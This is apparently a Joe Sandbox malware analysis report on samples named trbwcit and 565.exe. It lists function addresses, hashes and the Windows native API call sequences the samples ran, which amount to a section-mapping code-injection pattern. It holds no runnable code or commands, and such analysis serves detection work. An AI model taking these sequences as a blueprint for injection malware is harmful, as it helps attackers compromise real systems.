Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02CC003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CC024D

Strings

cess, xrefs: 02CC018D
kernel32.dll, xrefs: 02CC008F, 02CC0095

Memory Dump Source

Source File: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2cc0000_trbwcit.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: eb4fb2c8579feb1d98d09637ed203926217431dc0c01c4b43d6d7397d26ae795
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 83526974A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

Function 00415792 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158BF
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004158FC
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041591B

Strings

, xrefs: 00415825

Memory Dump Source

Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 0c7ca108b8e1f9837bab8f0d1351edd7a41117851920c5af44396fde0a8b5c73
Instruction ID: d67ab6015398af25ee4ccbcaa24419cc1747ddacc62f126d36a823bcbb263e11
Opcode Fuzzy Hash: 0c7ca108b8e1f9837bab8f0d1351edd7a41117851920c5af44396fde0a8b5c73
Instruction Fuzzy Hash: 81313E20A5B680CBF301CB78F8047823B62BB65744F548479D5498B3A5EBBA4534E7EF

Function 004157E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158BF
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004158FC
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041591B

Strings

, xrefs: 00415825

Memory Dump Source

Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

Function 02D5A516 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D5A53E
Module32First.KERNEL32(00000000,00000224), ref: 02D5A55E

Memory Dump Source

Source File: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d57000_trbwcit.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: c5928409bd92c8df353fa4d9b97dbac4470e974a2d57e09443486761d062729e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: DDF096315007306FDB203BF9A88CF6E76E8FF89665F140629EA43915C0DBB0ED458A61

Function 02CC0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02CC0223,?,?), ref: 02CC0E19
SetErrorMode.KERNELBASE(00000000,?,?,02CC0223,?,?), ref: 02CC0E1E

Memory Dump Source

Source File: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2cc0000_trbwcit.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 59145803a341f42eb765d6959b20131ad0ef228589562980b91258829723d85c
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 72D01231145128B7D7003A94DC09BCD7B1CDF05B66F108011FB0DD9080C770964046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02D5A1D5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D5A226

Memory Dump Source

Source File: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d57000_trbwcit.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: f978338136a82dcaecd83e5d0e5a4f0410a0b572ec96a3ec953c3269d6f5484d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: E0112779A00218EFDB01DF98C985E98BBF5AF08350F1580A4FA489B361D771EA90DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 004157B0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B18CE4,00415E4B), ref: 004157B8

Memory Dump Source

Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14

Non-executed Functions

Function 004159B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 004159E1
WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 00415A05
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415A0D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415A4D
GetComputerNameW.KERNEL32(?,?), ref: 00415A61
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A6F
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A7E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A8F

Strings

-, xrefs: 00415A9C

Memory Dump Source

Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: 14f241474e9e1da913b15f4f6307fbc2b0786e210afcc624a3eb522448752a14
Instruction ID: 11b84fe8b2b04f3d00d3004244583e2a87b640e11e3fb3d6ac6cb40e453acbe7
Opcode Fuzzy Hash: 14f241474e9e1da913b15f4f6307fbc2b0786e210afcc624a3eb522448752a14
Instruction Fuzzy Hash: 7821F731A84308EBD720DF94DC86BD97B70EF4C752F1181AAFA49AA1C0CAB459C4CB59

Function 00415AD0 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415B04
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B1F
HeapDestroy.KERNEL32(00000000), ref: 00415B3E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415B46

Memory Dump Source

Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: c6f65e21e8c25656cd2b46d0446d16c4be618aaecae73d91b7960579b50528bf
Instruction ID: 9b1347604edf95c8b03cd5cfcdcf1f5faacd6efc657b722f8f0869e5d5630474
Opcode Fuzzy Hash: c6f65e21e8c25656cd2b46d0446d16c4be618aaecae73d91b7960579b50528bf
Instruction Fuzzy Hash: 4E01A270A86504DBE650EBA4ED85BDA7BB8F70C346F404037E60A97280DA746D54CB9A

Analysis Process: 565.exePID: 8020, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	16.5%
Signature Coverage:	0%
Total number of Nodes:	170
Total number of Limit Nodes:	9

Executed Functions

Function 00415840 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415912
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041592B
FindAtomW.KERNEL32(00000000), ref: 00415932
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041593A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415952
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415979
MoveFileW.KERNEL32(00000000,00000000), ref: 00415981
GetVersionExW.KERNEL32(?), ref: 0041598E
DisconnectNamedPipe.KERNEL32(?), ref: 004159A1
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004159E6
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004159F5
LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415A0B
PulseEvent.KERNEL32(00000000), ref: 00415A1B
SetCommState.KERNELBASE(00000000,00000000), ref: 00415A44
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415A75
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415A86
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415A8E
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415ACE
GetFileAttributesA.KERNEL32(00000000), ref: 00415AD5
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415ADB
GetBinaryType.KERNEL32(0041742C,?), ref: 00415AED
LoadLibraryA.KERNELBASE(00417438), ref: 00415B72

Strings

}$, xrefs: 00415BC7
k`, xrefs: 00415BA3

Memory Dump Source

Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_565.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: 0f004dcb0baacb74f7bd845f89d4f92a998844297ece2a5bfd7f19758ff6c51e
Instruction ID: 1a4de0b24bdd0306310a4676e1e64ec04895e512500ce6235e9595c5278ae4d7
Opcode Fuzzy Hash: 0f004dcb0baacb74f7bd845f89d4f92a998844297ece2a5bfd7f19758ff6c51e
Instruction Fuzzy Hash: 3AA1F271802924EBC720EB65EC44ADF7B79FF89341F41406AF50AA7150DB385A81CFAD

Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

